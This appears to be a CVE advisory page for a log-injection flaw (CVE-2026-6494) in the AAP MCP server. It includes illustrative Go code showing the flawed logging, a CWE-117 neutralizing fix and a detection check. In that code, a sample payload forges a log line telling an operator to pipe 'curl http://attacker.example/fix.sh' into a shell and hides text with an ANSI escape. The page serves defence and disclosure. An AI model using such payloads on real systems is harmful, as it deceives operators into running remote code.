Red Hat AAP MCP Server Log Injection via toolsetroute Param
CVE-2026-6494 Published on April 17, 2026
Aap-mcp-server: aap mcp server: log injection allows social engineering attacks via unsanitized input
A flaw was found in the AAP MCP server. An unauthenticated remote attacker can exploit a log injection vulnerability by sending specially crafted input in the `toolsetroute` parameter. The parameter value is not neutralized before it is written to logs, so an attacker can embed control characters such as newlines (which split one log record into several) and the ESC byte that begins ANSI escape sequences (which can erase or recolour what a terminal displays). This lets the attacker obscure legitimate log entries and insert forged ones, which could facilitate social engineering attacks, potentially leading to an operator executing dangerous commands or visiting malicious URLs that appear in the log.
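The flawed pattern, its CWE-117 fix, and a detection check, as an added example in Go. This is illustrative code written for this page, not the AAP MCP server's own code; the log format, the handler shape, the use of `toolsetroute` as a plain string value, and the sample payload are all assumptions.

```go
package main

import (
	"fmt"
	"strings"
	"unicode"
)

// Constructed sample payload (assumption, not from the advisory): a
// `toolsetroute` value that carries a newline, a forged second record that
// tells an operator to pipe a remote script into a shell, and an ANSI
// "erase line" sequence (ESC [ 2 K) that would hide text on a terminal.
const samplePayload = "tools\n2026-04-17T10:00:00Z WARN operator: run 'curl http://attacker.example/fix.sh | sh' to repair\x1b[2K"

// formatLogUnsafe mirrors the flawed pattern (illustrative, not the project's
// code): the parameter value is written into the record as-is.
func formatLogUnsafe(toolsetroute string) string {
	return "2026-04-17T10:00:00Z INFO toolsetroute=" + toolsetroute + " status=200"
}

// neutralizeForLog is the CWE-117 fix: every control character, including
// CR, LF and ESC (0x1b, the start of every ANSI sequence), is replaced by a
// visible escape, so one request can only ever produce one log record and
// no raw terminal control bytes. Backslash is escaped too, so an attacker
// cannot spell out "\n" to mimic the neutralizer's own output.
func neutralizeForLog(s string) string {
	var b strings.Builder
	for _, r := range s {
		switch {
		case r == '\\':
			b.WriteString(`\\`)
		case r == '\n':
			b.WriteString(`\n`)
		case r == '\r':
			b.WriteString(`\r`)
		case r == '\t':
			b.WriteString(`\t`)
		case unicode.IsControl(r):
			fmt.Fprintf(&b, `\x%02x`, r)
		default:
			b.WriteRune(r)
		}
	}
	return b.String()
}

// formatLogSafe is the same record with the parameter neutralized first.
func formatLogSafe(toolsetroute string) string {
	return "2026-04-17T10:00:00Z INFO toolsetroute=" + neutralizeForLog(toolsetroute) + " status=200"
}

// recordCount is how many lines a log reader would see for one request.
func recordCount(record string) int {
	return len(strings.Split(strings.TrimRight(record, "\n"), "\n"))
}

// hasControlChars is the detection side: true when a raw parameter value, or
// an already-written log line, contains control bytes that have no business
// in a route name. Run it over request logs to find exploitation attempts.
func hasControlChars(s string) bool {
	return strings.IndexFunc(s, unicode.IsControl) >= 0
}

func main() {
	fmt.Println("records from one request, unsafe:", recordCount(formatLogUnsafe(samplePayload)))
	fmt.Println("records from one request, safe:  ", recordCount(formatLogSafe(samplePayload)))
	fmt.Println(formatLogSafe(samplePayload))
	fmt.Println("payload flagged:", hasControlChars(samplePayload))
}
```

The unsafe formatter turns a single request into two log lines, the second of which looks like a genuine WARN record; the neutralized formatter keeps it to one line in which the injected newline and ESC are visible as `\n` and `\x1b`. Escaping is preferred to silent stripping because the escaped bytes remain as evidence of the attempt.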
Vulnerability Analysis
As rated, CVE-2026-6494 is exploitable over the network with low attack complexity, and requires neither privileges nor user interaction. The rated impact is none for confidentiality, none for integrity, and none for availability: the direct effect is confined to the content of the log, and the practical risk is the downstream one described above, an operator acting on a forged log entry.
Timeline
Reported to Red Hat.
Made public.
Weakness Type
CWE-117: Improper Output Neutralization for Logs
The software does not neutralize, or incorrectly neutralizes, output that is written to logs. Here the unneutralized output is the attacker-controlled `toolsetroute` value.
Products Associated with CVE-2026-6494
Want to know whenever a new CVE is published for Red Hat Ansible Automation Platform? stack.watch will email you.